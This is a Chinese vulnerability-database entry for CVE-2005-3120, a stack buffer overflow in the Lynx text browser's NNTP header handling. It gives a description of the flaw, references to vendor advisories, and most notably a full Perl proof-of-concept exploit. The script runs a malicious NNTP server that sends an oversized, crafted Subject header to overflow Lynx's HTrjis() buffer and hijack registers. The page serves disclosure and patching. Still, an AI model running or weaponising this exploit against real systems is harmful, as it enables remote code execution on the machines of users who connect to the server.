Lynx NNTP文章首部处理缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109144 漏洞类型 缓冲区溢出
发布时间 2005-10-17 更新时间 2005-11-02
CVE编号 CVE-2005-3120 CNNVD-ID CNNVD-200510-130
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1256
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-130
|漏洞详情
Lynx是一个基于文本的WWW浏览器。它不能够显示图像或Java句柄,所以执行速度非常快。Lynx在处理某些畸形的NNTP文章首部时存在缓冲区溢出,成功利用这个漏洞的攻击者可以完全控制EIP、EBX、EBP、ESI和EDI,导致在目标系统中执行任意代码。当Lynx连接到NNTP服务器获取新闻组中的文章时,会用某些文章首部的信息调用HTrjis()函数。该函数将缺失的ESC字符添加到某些数据以支持亚洲字符组。但是,函数没有检查是否将字符写到了字符数组缓冲区之外,导致栈溢出。
|漏洞EXP
#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
my $file = shift;
my $str = shift;

print $file "$str\n";
print "SENT: $str\n";
} # sub mysend

sub myreceive($)
{
my $file = shift;
my $inp;

eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};

if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;


while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";


mysend($client, '200 Internet News');
my $group = 'alt.angst';

while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}

if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}

if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}

if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);

my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE

$head =~ s|\s+$||s;
mysend($client, $head);
next;
}

mysend($client, '500 Syntax Error');
} # while str=myreceive(client)

close $client;
print "closed\n\n\n";
} # while client=server->accept()
}

# milw0rm.com [2005-10-17]
|参考资料

来源:FULLDISC
名称:20051017LynxRemoteBufferOverflow
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
来源:MISC
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170253
来源:REDHAT
名称:RHSA-2005:803
链接:http://www.redhat.com/support/errata/RHSA-2005-803.html
来源:UBUNTU
名称:USN-206-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-206-1
来源:BID
名称:15117
链接:http://www.securityfocus.com/bid/15117
来源:BUGTRAQ
名称:20060602Re:[SECURITY][DSA1085-1]Newlynx-curpackagesfixseveralvulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/435689/30/4740/threaded
来源:FEDORA
名称:FLSA:152832
链接:http://www.securityfocus.com/archive/1/archive/1/419763/100/0/threaded
来源:OPENPKG
名称:OpenPKG-SA-2005.026
链接:http://www.openpkg.org/security/OpenPKG-SA-2005.026-lynx.html
来源:SUSE
名称:SUSE-SR:2005:025
链接:http://www.novell.com/linux/security/advisories/2005_25_sr.html
来源:MANDRIVA
名称:MDKSA-2005:186
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2005:186
来源:GENTOO